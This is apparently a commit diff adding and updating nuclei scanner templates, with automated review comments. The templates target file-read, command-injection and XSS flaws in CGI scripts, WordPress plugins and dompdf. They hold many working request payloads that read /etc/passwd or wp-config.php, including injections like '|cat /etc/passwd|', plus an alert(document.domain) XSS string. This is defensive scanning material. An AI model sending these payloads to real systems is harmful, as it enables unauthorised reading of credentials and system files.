     348 + - "forum1.asp?n=1753&nn=../../../../../../../../../../etc/passwd"
     349 + - "forum1.asp?n=1753&nn=../../../../../../../../../../etc/passwd%00"
     350 + - "forum1.asp?n=1753&nn=/etc/passwd"
     351 + - "forum1.asp?n=1753&nn=/etc/passwd%00"
     352 + - "forum1_professionnel.asp?n=%60/etc/passwd%60&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record."
     353 + - "forum1_professionnel.asp?n=../../../../../../../../../etc/passwd%00&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_curren"
     354 + - "forum1_professionnel.asp?n=/../../../../../../../../etc/passwd&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_rec"
     355 + - "forum1_professionnel.asp?n=/etc/passwd%00&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record."
     356 + - "forum1_professionnel.asp?n=/etc/passwd&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record."
     357 + - "forum1_professionnel.asp?n=1771&nn=%60/etc/passwd%60&page=1"
     358 + - "forum1_professionnel.asp?n=1771&nn=../../../../../../../../../etc/passwd%00&page=1"
     359 + - "forum1_professionnel.asp?n=1771&nn=/../../../../../../../../etc/passwd&page=1"
     360 + - "forum1_professionnel.asp?n=1771&nn=/etc/passwd%00&page=1"
     361 + - "forum1_professionnel.asp?n=1771&nn=/etc/passwd&page=1"
     362 + - "forum1_professionnel.asp?n=1771&nn=100&page=%60/etc/passwd%60"
     363 + - "forum1_professionnel.asp?n=1771&nn=100&page=../../../../../../../../../etc/passwd%00"
     364 + - "forum1_professionnel.asp?n=1771&nn=100&page=/../../../../../../../../../../etc/passwd"
     365 + - "forum1_professionnel.asp?n=1771&nn=100&page=/etc/passwd"
     366 + - "forum1_professionnel.asp?n=1771&nn=100&page=/etc/passwd%00"
     367 + - "forum_arc.asp?n=%60/etc/passwd%60|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'."
     368 + - "forum_arc.asp?n=../../../../../../../../../etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
     369 + - "forum_arc.asp?n=/../../../../../../../../etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
     370 + - "forum_arc.asp?n=/etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
     371 + - "forum_arc.asp?n=/etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
     372 + - "forum_professionnel.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'."
     373 + - "forum_professionnel.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
     374 + - "forum_professionnel.asp?n=/../../../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
     375 + - "forum_professionnel.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
     376 + - "forum_professionnel.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
     377 + - "gallery/index.php?include=../../../../../../../../../etc/passwd"
     378 + - "generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1"
     379 + - "guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|"
     380 + - "hsx.cgi?show=../../../../../../../../../../../etc/passwd%00"
     381 + - "htgrep?file=index.html&hdr=/etc/passwd"
     382 + - "htmlscript?../../../../../../../../../../etc/passwd"
     383 + - "htsearch?exclude=%60/etc/passwd%60"
     384 + - "i?/etc/passwd"
     385 + - "imprimer.asp?no=%60/etc/passwd%60|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'."
     386 + - "imprimer.asp?no=../../../../../../../../../etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
     387 + - "imprimer.asp?no=/../../../../../../../../etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
     388 + - "imprimer.asp?no=/etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
     389 + - "imprimer.asp?no=/etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'."
     390 + - "index.php?download=/etc/passwd"
     391 + - "index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd"
     392 + - "index.php?page=../../../../../../../../../../etc/passwd"
     393 + - "index.php?|=../../../../../../../../../etc/passwd"
     394 + - "info2www '(../../../../../../../bin/mail root </etc/passwd>"
     395 + - "ion-p?page=../../../../../etc/passwd"
     396 + - "jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd"
     397 + - "jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../etc/passwd"
     398 + - "k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor"
     399 + - "loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd"
     400 + - "logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00|"
     401 + - "magiccard.cgi?pa=3Dpreview&amp;next=3Dcustom&amp;page=3D../../../../../../../../../../etc/passwd"
     402 + - "mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00"
     403 + - "mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00"
     404 + - "mailview.cgi?cmd=view&amp;fldrname=inbox&amp;select=1&amp;html=../../../../../../etc/passwd"
     405 + - "main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd"
     406 + - "modif_infos.asp?n=%60/etc/passwd%60"
     407 + - "modif_infos.asp?n=../../../../../../../../../etc/passwd%00"
     408 + - "modif_infos.asp?n=/../../../../../../../../../etc/passwd"
     409 + - "modif_infos.asp?n=/etc/passwd"
     410 + - "modif_infos.asp?n=/etc/passwd%00"
     411 + - "modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd"
     412 + - "mrtg.cfg?cfg=../../../../../../../../etc/passwd"
     413 + - "mrtg.cgi?cfg=../../../../../../../../etc/passwd"
     414 + - "multihtml.pl?multi=/etc/passwd%00html"
     415 + - "mylog.html?screen=/etc/passwd"
     416 + - "mylog.phtml?screen=/etc/passwd"
     417 + - "netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd"
     418 + - "netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd"
     419 + - "newsdesk.cgi?t=../../../../../../../../../../etc/passwd"
     420 + - "nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00"
     421 + - "nph-emumail.cgi?type=/../../../../../../../../../../../../../../../etc/passwd%00"
     422 + - "nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0"
     423 + - "opendir.php?/etc/passwd"
     424 + - "opendir.php?requesturl=/etc/passwd"
     425 + - "page.cgi?../../../../../../../../../../etc/passwd"
     426 + - "pals-cgi?palsAction=restart&documentName=/etc/passwd"
     427 + - perl/-e%20%22system('cat%20/etc/passwd');\%22
     428 + - "pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'"
     429 + - "pfdispaly.cgi?../../../../../../../../../../etc/passwd"
     430 + - "pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'"
     431 + - "phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd"
     432 + - "phf?Qname=root%0Acat%20/etc/passwd%20"
     433 + - "php.cgi?/etc/passwd"
     434 + - "php/mylog.html?screen=/etc/passwd"
     435 + - "php/mylog.phtml?screen=/etc/passwd"
     436 + - "phprocketaddin/?page=../../../../../../../../../../etc/passwd"
     437 + - "phptonuke.php?filnavn=/etc/passwd"
     438 + - "phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd"
     439 + - "powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd"
     440 + - "publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10"
     441 + - "put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd"
     442 + - "quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id="
     443 + - "r.cgi?FILE=../../../../../../../../../../etc/passwd"
     444 + - "rubrique.asp?no=%60/etc/passwd%60|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;."
     445 + - "rubrique.asp?no=../../../../../../../../../etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;."
     446 + - "rubrique.asp?no=/../../../../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;."
     447 + - "rubrique.asp?no=/../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;."
     448 + - "rubrique.asp?no=/etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;."
     449 + - "rubrique.asp?no=/etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;."
     450 + - "sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1"
     451 + - "search.pl?form=../../../../../../../../../../etc/passwd%00"
     452 + - "search?NS-query-pat=../../../../../../../../../../etc/passwd"
     453 + - "sendtemp.pl?templ=../../../../../../../../../../etc/passwd"
     454 + - "servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00"
     455 + - "sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd"
     456 + - "shop.cgi?page=../../../../../../../etc/passwd"
     457 + - "shop/member_html.cgi?file=;cat%20/etc/passwd|"
     458 + - "shop/member_html.cgi?file=|cat%20/etc/passwd|"
     459 + - "shop/normal_html.cgi?file=;cat%20/etc/passwd|"
     460 + - "shop/normal_html.cgi?file=|cat%20/etc/passwd|"
     461 + - "shopper.cgi?newpage=../../../../../../../../../../etc/passwd"
     462 + - "shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|"
     463 + - "shoutbox.php?conf=../../../../../../../etc/passwd"
     464 + - "shoutbox/expanded.php?conf=../../../../../../../etc/passwd%20"
     465 + - "simple/view_page?mv_arg=|cat%20/etc/passwd|"
     466 + - "smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|"
     467 + - "smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|"
     468 + - "ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
     469 + - "store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html"
     470 + - "store/index.cgi?page=../../../../../../../../etc/passwd"
     471 + - "story.pl?next=../../../../../../../../../../etc/passwd%00"
     472 + - "story/story.pl?next=../../../../../../../../../../etc/passwd%00"
     473 + - "support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd"
     474 + - "talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1"
     475 + - "technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd"
     476 + - "technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../etc/passwd"
     477 + - "tmp_view.php?file=/etc/passwd"
     478 + - "traffic.cgi?cfg=../../../../../../../../etc/passwd"
     479 + - "ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd"
     480 + - "userreg.cgi?cmd=insert&amp;lang=eng&amp;tnum=3&amp;fld1=test999%0acat&lt;/var/spool/mail/login&gt;&gt;/etc/passwd"
     481 + - "ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd"
     482 + - "view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00"
     483 + - "viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1"
     484 + - "viewpage.php?file=/etc/passwd"
     485 + - "viewsource?/etc/passwd"
     486 + - "way-board.cgi?db=/etc/passwd%00"
     487 + - "way-board/way-board.cgi?db=/etc/passwd%00"
     488 + - "webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif"
     489 + - "webbbs/webbbs_config.pl?name=joe&[email protected]&body=aaaaffff&followup=10;cat%20/etc/passwd"
     490 + - "webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd"
     491 + - "webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD"
     492 + - "webdist.cgi?distloc=;cat%20/etc/passwd"
     493 + - "webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00"
     494 + - "webplus?script=../../../../../../../../../../etc/passwd"
     495 + - "webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd"
     496 + - "whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd"
     497 + - "whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd"
     498 + - "whois_raw.cgi?fqdn=%0Acat%20/etc/passwd"
     499 + - "zml.cgi?file=../../../../../../../../../../etc/passwd%00"
     500 + - "~nobody/etc/passwd"
     501 + attack: clusterbomb
     502 + stop-at-first-match: true
     503 + matchers:
     504 + - type: word
     505 + part: body
     506 + words:
     507 + - 'root:x:'
     508 +
     509 + redirects: false
     510 +
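Review bot: several entries in this payload list are not request paths and should be dropped or corrected before merge: the `forum_arc.asp`, `forum_professionnel.asp`, `imprimer.asp` and `rubrique.asp` lines carry a `|NN|80040e14|[Microsoft][ODBC_SQL_Server_Driver]...` suffix that reads like the remaining columns of a scanner-database row, and the `rubrique.asp`, `magiccard.cgi`, `mailview.cgi` and `userreg.cgi` entries still contain HTML entities (`&amp;`, `&#039;`, `&lt;`, `&gt;`) from wherever they were copied; as written they only generate requests that cannot match. Style: the `perl/-e%20%22system(...)` entry is the only unquoted scalar in the list, so quote it like its neighbours to keep the YAML uniform. For consistency with this same commit, the lone `root:x:` word matcher could use the `root:[x*]:0:0` regex that CVE-2014-2383.yaml adopts below.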
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2008/CVE-2008-1059.yaml
     1 +id: CVE-2008-1059
     2 + 
     3 +info:
     4 + name: WordPress Sniplets 1.1.2 - Local File Inclusion
     5 + author: dhiyaneshDK
     6 + severity: high
     7 + description: |
     8 + PHP remote file inclusion vulnerability in modules/syntax_highlight.php in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the libpath parameter.
     9 + reference:
     10 + - https://www.exploit-db.com/exploits/5194
     11 + - https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2008-1059
     13 + - http://secunia.com/advisories/29099
     14 + classification:
     15 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     16 + cvss-score: 7.5
     17 + cve-id: CVE-2008-1061
     18 + cwe-id: CWE-22
     19 + tags: cve,cve2008,wordpress,wp-plugin,lfi,wp,sniplets
     20 + 
     21 +requests:
     22 + - method: GET
     23 + path:
     24 + - '{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php'
     25 + 
     26 + matchers-condition: and
     27 + matchers:
     28 + - type: word
     29 + part: body
     30 + words:
     31 + - "DB_NAME"
     32 + - "DB_PASSWORD"
     33 + condition: and
     34 + 
     35 + - type: status
     36 + status:
     37 + - 200
     38 + 
     39 +# Enhanced by mp on 2022/07/29
     40 + 
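Review bot: `cve-id: CVE-2008-1061` in the classification block contradicts `id: CVE-2008-1059` at the top of the file, so results from this template would be attributed to the wrong CVE; it should be `cve-id: CVE-2008-1059`. Related inconsistency: `name` says Local File Inclusion and `cwe-id` is CWE-22, but the description (the NVD text) describes PHP remote file inclusion via a URL in `libpath`; since the request actually sends `libpath=../../../../wp-config.php` and matches on `DB_NAME`/`DB_PASSWORD`, add a sentence to the description saying the template checks the local-read variant, or reconsider the CWE.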
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2008/CVE-2008-1061.yaml
     1 +id: CVE-2008-1061
     2 + 
     3 +info:
     4 + name: Wordpress Plugin Sniplets 1.2.2 - Cross-Site Scripting
     5 + author: dhiyaneshDK
     6 + severity: medium
     7 + description: |
     8 + Multiple cross-site scripting (XSS) vulnerabilities in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) text parameter to (a) warning.php, (b) notice.php, and (c) inset.php in view/sniplets/, and possibly (d) modules/execute.php; the (2) url parameter to (e) view/admin/submenu.php; and the (3) page parameter to (f) view/admin/pager.php.
     9 + reference:
     10 + - https://www.exploit-db.com/exploits/5194
     11 + - https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2008-1061
     13 + - http://secunia.com/advisories/29099
     14 + tags: cve,cve2008,xss,wordpress,wp-plugin,wp,sniplets
     15 + 
     16 +requests:
     17 + - method: GET
     18 + path:
     19 + - '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
     20 + 
     21 + matchers-condition: and
     22 + matchers:
     23 + - type: word
     24 + part: body
     25 + words:
     26 + - "</script><script>alert(document.domain)</script>"
     27 + 
     28 + - type: word
     29 + part: header
     30 + words:
     31 + - text/html
     32 + 
     33 + - type: status
     34 + status:
     35 + - 200
     36 + 
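Review bot: this template lacks the `classification` block (`cvss-metrics`, `cvss-score`, `cve-id`, `cwe-id`) that its sibling CVE-2008-1059.yaml in the same commit carries; add one (CWE-79 for XSS) so tooling that keys on `cve-id` picks it up. Minor: `Wordpress` in `name` should be `WordPress`, as spelled in every other template here.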
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2014/CVE-2014-2383.yaml
    1 1  id: CVE-2014-2383
    2 2   
    3 3  info:
    4  - name: Arbitrary file read in dompdf < v0.6.0
    5  - author: 0x_Akoko
     4 + name: Dompdf < v0.6.0 - Local File Inclusion
     5 + author: 0x_Akoko,akincibor,ritikchaddha
    6 6   severity: high
    7  - description: A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter.
     7 + description: |
     8 + A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter.
    8 9   reference:
    9  - - https://nvd.nist.gov/vuln/detail/CVE-2014-2383
    10 10   - https://www.exploit-db.com/exploits/33004
    11 11   - http://seclists.org/fulldisclosure/2014/Apr/258
    12 12   - https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2383/
     13 + - https://wpscan.com/vulnerability/1d64d0cb-6b71-47bb-8807-7c8350922582
     14 + - https://nvd.nist.gov/vuln/detail/CVE-2014-2383
    13 15   classification:
    14 16   cve-id: CVE-2014-2383
    15 17   metadata:
    16  - unix-payload: /dompdf.php?input_file=/etc/passwd
    17  - win-payload: /dompdf.php?input_file=C:/windows/win.ini
    18  - tags: cve,cve2014,dompdf,lfi
     18 + verified: "true"
     19 + tags: cve,cve2014,dompdf,lfi,wordpress,wp-plugin,wp
    19 20   
    20 21  requests:
    21 22   - method: GET
    22 23   path:
    23  - - "{{BaseURL}}/dompdf.php?input_file=dompdf.php"
    24  - - "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php"
    25  - - "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=dompdf.php"
    26  - - "{{BaseURL}}/includes/dompdf/dompdf.php?input_file=dompdf.php"
     24 + - "{{BaseURL}}/dompdf.php?input_file=php://filter/resource=/etc/passwd"
     25 + - "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd"
     26 + - "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
     27 + - "{{BaseURL}}/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
     28 + - "{{BaseURL}}/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
     29 + - "{{BaseURL}}/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
     30 + - "{{BaseURL}}/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd"
     31 + - "{{BaseURL}}/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
     32 + - "{{BaseURL}}/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
     33 + - "{{BaseURL}}/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
     34 + - "{{BaseURL}}/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
    27 35   
    28 36   stop-at-first-match: true
    29 37   matchers-condition: and
    30 38   matchers:
     39 + - type: regex
     40 + regex:
     41 + - "root:[x*]:0:0"
     42 + 
    31 43   - type: word
    32 44   words:
    33 45   - "application/pdf"
    skipped 5 lines
    39 51   status:
    40 52   - 200
    41 53   
    42  -# Enhanced by mp on 2022/02/24
     54 +# Enhanced by mp on 2022/08/06
    43 55   
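Review bot: the new `root:[x*]:0:0` regex is combined with the pre-existing `application/pdf` word matcher under `matchers-condition: and`, so the passwd line must appear in plaintext inside the PDF body. dompdf emits page content in PDF streams that are commonly Flate-compressed, in which case the regex will not see the text even when the read succeeded; since this change also sets `verified: "true"`, please state in the commit message which dompdf version and configuration the combined match was confirmed against. Style: the new matcher omits `part: body`, which the other new templates in this commit specify explicitly.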
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2014/CVE-2014-9119.yaml
     1 +id: CVE-2014-9119
     2 + 
     3 +info:
     4 + name: WordPress DB Backup <=4.5 - Local File Inclusion
     5 + author: dhiyaneshDK
     6 + severity: high
     7 + description: |
     8 + WordPress Plugin DB Backup 4.5 and possibly prior versions are prone to a local file inclusion vulnerability because they fail to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.
     9 + reference:
     10 + - https://wpscan.com/vulnerability/d3f1e51e-5f44-4a15-97bc-5eefc3e77536
     11 + - https://www.exploit-db.com/exploits/35378
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2014-9119
     13 + - https://wpvulndb.com/vulnerabilities/7726
     14 + classification:
     15 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     16 + cvss-score: 7.5
     17 + cve-id: CVE-2014-9119
     18 + cwe-id: CWE-22
     19 + tags: cve,cve2014,wordpress,wp-plugin,lfi,wp,backup
     20 + 
     21 +requests:
     22 + - method: GET
     23 + path:
     24 + - '{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php'
     25 + 
     26 + matchers-condition: and
     27 + matchers:
     28 + - type: word
     29 + part: body
     30 + words:
     31 + - "DB_NAME"
     32 + - "DB_PASSWORD"
     33 + condition: and
     34 + 
     35 + - type: status
     36 + status:
     37 + - 200
     38 + 
     39 +# Enhanced by mp on 2022/08/05
     40 + 
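Review bot: `https://wpvulndb.com/vulnerabilities/7726` and the `https://wpscan.com/vulnerability/d3f1e51e-...` entry very likely point at the same advisory, since wpvulndb.com is the former domain of the WPScan database; keep only the wpscan.com reference. The matcher set (`DB_NAME` and `DB_PASSWORD` with `condition: and`, plus status 200) is appropriately strict.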
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2015/CVE-2015-1000005.yaml
     1 +id: CVE-2015-1000005
     2 + 
     3 +info:
     4 + name: WordPress Candidate Application Form <= 1.3 - Local File Inclusion
     5 + author: dhiyaneshDK
     6 + severity: high
     7 + description: |
     8 + WordPress Candidate Application Form <= 1.3 is susceptible to arbitrary file downloads because the code in downloadpdffile.php does not do any sanity checks.
     9 + reference:
     10 + - https://wpscan.com/vulnerability/446233e9-33b3-4024-9b7d-63f9bb1dafe0
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2015-1000005
     12 + - http://www.vapidlabs.com/advisory.php?v=142
     13 + classification:
     14 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     15 + cvss-score: 7.5
     16 + cve-id: CVE-2015-1000005
     17 + cwe-id: CWE-22
     18 + tags: cve,cve2015,wordpress,wp-plugin,lfi,wp
     19 + 
     20 +requests:
     21 + - method: GET
     22 + path:
     23 + - '{{BaseURL}}/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd'
     24 + 
     25 + matchers-condition: and
     26 + matchers:
     27 + - type: regex
     28 + regex:
     29 + - "root:[x*]:0:0"
     30 + 
     31 + - type: status
     32 + status:
     33 + - 200
     34 + 
     35 +# Enhanced by mp on 2022/04/21
     36 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2015/CVE-2015-1000010.yaml
     1 +id: CVE-2015-1000010
     2 + 
     3 +info:
     4 + name: WordPress Simple Image Manipulator < 1.0 - Local File Inclusion
     5 + author: dhiyaneshDK
     6 + severity: high
     7 + description: |
     8 + WordPress Simple Image Manipulator 1.0 is vulnerable to local file inclusion in ./simple-image-manipulator/controller/download.php because no checks are made to authenticate users or sanitize input when determining file location.
     9 + reference:
     10 + - https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html
     11 + - https://wpscan.com/vulnerability/40e84e85-7176-4552-b021-6963d0396543
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2015-1000010
     13 + - http://www.vapidlabs.com/advisory.php?v=147
     14 + classification:
     15 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     16 + cvss-score: 7.5
     17 + cve-id: CVE-2015-1000010
     18 + cwe-id: CWE-22
     19 + tags: cve,cve2015,wordpress,wp-plugin,lfi,wp
     20 + 
     21 +requests:
     22 + - method: GET
     23 + path:
     24 + - '{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd'
     25 + 
     26 + matchers-condition: and
     27 + matchers:
     28 + - type: regex
     29 + regex:
     30 + - "root:[x*]:0:0"
     31 + 
     32 + - type: status
     33 + status:
     34 + - 200
     35 + 
     36 +# Enhanced by mp on 2022/07/29
     37 + 
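Review bot: the request path carries a literal `./` segment (`/wp-content/plugins/./simple-image-manipulator/controller/download.php`), copied from the advisory wording in the description rather than from the plugin's real layout; servers that do not normalise dot segments will answer 404 and the template will miss. Use the plain path `/wp-content/plugins/simple-image-manipulator/controller/download.php`.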
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2015/CVE-2015-1579.yaml
     1 +id: CVE-2015-1579
     2 + 
     3 +info:
     4 + name: WordPress Slider Revolution - Local File Disclosure
     5 + author: pussycat0x
     6 + severity: high
     7 + description: |
     8 + Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.
     9 + reference:
     10 + - https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
     11 + - https://cxsecurity.com/issue/WLB-2021090129
     12 + - https://wpscan.com/vulnerability/4b077805-5dc0-4172-970e-cc3d67964f80
     13 + - https://nvd.nist.gov/vuln/detail/CVE-2015-1579
     14 + classification:
     15 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     16 + cvss-score: 7.5
     17 + cve-id: CVE-2015-1579
     18 + cwe-id: CWE-22
     19 + metadata:
